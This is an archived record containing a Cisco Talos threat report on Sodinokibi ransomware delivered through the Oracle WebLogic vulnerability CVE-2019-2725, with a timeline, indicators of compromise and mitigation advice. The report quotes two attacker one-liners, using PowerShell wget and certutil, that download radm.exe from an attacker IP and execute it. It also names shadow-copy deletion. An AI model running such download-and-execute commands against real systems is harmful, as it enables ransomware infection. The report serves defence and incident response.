{
	"id": "1c1b76fd-240b-4af9-8f6e-8e4f27ea81f3",
	"created_at": "2026-04-06T00:11:27.815191Z",
	"updated_at": "2026-04-10T13:11:38.954881Z",
	"deleted_at": null,
	"sha1_hash": "63d2cd8623f17edbf9928031524266764d68b7f9",
	"title": "Sodinokibi ransomware exploits WebLogic Server vulnerability",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 817074,
	"plain_text": "Sodinokibi ransomware exploits WebLogic Server vulnerability\r\nBy Cisco Talos\r\nPublished: 2019-04-30 · Archived: 2026-04-05 15:41:15 UTC\r\nTuesday, April 30, 2019 14:00\r\nBy Pierre Cadieux, Colin Grady, Jaeson Schultz and Matt Valites.\r\nAttackers are actively exploiting a recently disclosed vulnerability in Oracle WebLogic to install a new variant of ransomware called \"Sodinokibi.\" Sodinokibi attempts to encrypt data in a user's directory and delete shadow copy backups to make data recovery more difficult. Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10. Attackers have been making use of this exploit in the wild since at least April 17. Cisco's Incident Response (IR) team, along with Cisco Talos, is actively investigating these attacks and Sodinokibi.\r\nhttps://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html\r\nPage 1 of 8\r\nInitial stages of the ransomware attack occurred on April 25, the day before Oracle released their update. This was a trial to see whether the server was exploitable.\r\nApril 25, 2019 activity showing the initial activity preceding the ransomware deployment.\r\nOn April 26, 2019, the attackers made an HTTP connection to a different vulnerable server, requesting the AsyncResponderService of the Oracle WebLogic Server.\r\nActivity from April 26. The attackers are downloading the Sodinokibi ransomware.\r\nHistorically, most varieties of ransomware have required some form of user interaction, such as a user opening an attachment to an email message, clicking on a malicious link, or running a piece of malware on the device. In this case, the attackers simply leveraged the Oracle WebLogic vulnerability, causing the affected server to download a copy of the ransomware from attacker-controlled IP addresses 188.166.74[.]218 and 45.55.211[.]79. The 188.166.74[.]218 IP address is also home to a pair of other malicious domains unrelated to this ransomware attack: arg0s-co[.]uk, which is likely a phishing domain, and projectstore[.]guru, a domain with bogus PDF-related Google search results. The other IP, 45.55.211[.]79, hosts a pair of legitimate Chilean domains, and appears to have been infected and repurposed by the attackers. The attackers were ultimately successful at encrypting a number of systems during this incident.\r\nCisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136. The HTTP POST request contained arguments to a cmd.exe instruction — a PowerShell command to download a file called \"radm.exe\" from host 188.166.74[.]218, then save that file locally and execute it.\r\ncmd /c powershell.exe wget http[:]//188.166.74[.]218/radm.exe -outfile %TEMP%/radm.exe\u0026cmd.exe /c %TEMP%\\\\radm.exe\r\nIn addition to PowerShell, we also observed the attackers creatively passing the certutil utility to cmd to download a file:\r\ncmd /c cmd.exe /c certutil.exe -urlcache -split -f http[:]//188.166.74[.]218/radm.exe %TEMP%/radm.exe\u0026cmd.exe /c %TEMP%\\\\radm.exe\r\nOnce detonated in Threat Grid, the sandbox identified this sample as potential ransomware.\r\nThe website VirusTotal successfully detected the same binary hash on 43 out of 71 different engines.\r\nBelow, we can see the malicious file \"untitled.exe\" using \"cmd.exe\" to execute the vssadmin.exe utility. This action is a common tactic of ransomware to prevent users from easily recovering their data. It attempts to delete default Windows backup mechanisms, otherwise known as \"shadow copies,\" to prevent recovery of the original files from these backups.\r\nThe ransom note, in this case, directs victims to either a .onion website on the Tor network or on the public web at the domain decryptor[.]top, registered on March 31 this year. With Sodinokibi, each encrypted system sees a distinct encrypted file extension. The ransom note filename also includes this extension as a prefix (e.g. 88f2947s-HOW-TO-DECRYPT.txt).\r\nThe Gandcrab affiliate connection\r\nAfter deploying Sodinokibi ransomware inside the victim's network, the attackers followed up with an additional CVE-2019-2725 exploit attempt approximately eight hours later. However, this time, the attackers chose to distribute Gandcrab v5.2. We find it strange that the attackers would choose to distribute additional, different ransomware on the same target. Since Sodinokibi is a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab.\r\nConclusion\r\nThis attack is notable because of the attackers' use of a zero-day exploit to distribute ransomware. Whereas previously we have witnessed ransomware attackers taking advantage of unpatched systems to install and laterally propagate ransomware, this zero-day exploitation method could work on otherwise fully-patched systems.\r\nThe victims in this ransomware attack were able to activate their Incident Response Retainer with Cisco IR Services, and they received immediate support and advice on managing the incident. Immediate actions taken likely prevented a more significant outage.\r\nDue to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725, and we recommend the following actions. Any number of layered controls could prevent or otherwise deter this type of attack, including:\r\nPatch WebLogic as soon as possible against CVE-2019-2725.\r\nLog and centrally collect web, application, and operating system events.\r\nRestrict the access of the account used to run the WebLogic process.\r\nMonitor for signs of compromise:\r\nEgress network communications from data center systems.\r\nRansomware \"Canary\" files.\r\nExternal HTTP POSTs to new URIs.\r\nWeb shells.\r\nUnexpected activity of service/system accounts (WebLogic user).\r\nScan for, understand, and mitigate your vulnerability posture.\r\nRestrict egress data center communications.\r\nSegment the network for defense and monitoring.\r\nControl URL access (in this case external access to \"/_async/*\" and \"/wls-wsat/*\").\r\nPlan for disaster recovery, including maintaining and testing data backups and recovery.\r\nConfigure PowerShell to execute only signed scripts.\r\nIndicators of Compromise (IoC)\r\nRansomware samples:\r\nDistribution URLs:\r\nhxxp://188.166.74[.]218/office.exe\r\nhxxp://188.166.74[.]218/radm.exe\r\nhxxp://188.166.74[.]218/untitled.exe\r\nhxxp://45.55.211[.]79/.cache/untitled.exe\r\nAttacker IP:\r\n130.61.54[.]136\r\nAttacker Domain:\r\ndecryptor[.]top\r\nSource: https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html"
	],
	"report_names": [
		"sodinokibi-ransomware-exploits-weblogic.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434287,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/63d2cd8623f17edbf9928031524266764d68b7f9.pdf",
		"text": "https://archive.orkl.eu/63d2cd8623f17edbf9928031524266764d68b7f9.txt",
		"img": "https://archive.orkl.eu/63d2cd8623f17edbf9928031524266764d68b7f9.jpg"
	}
}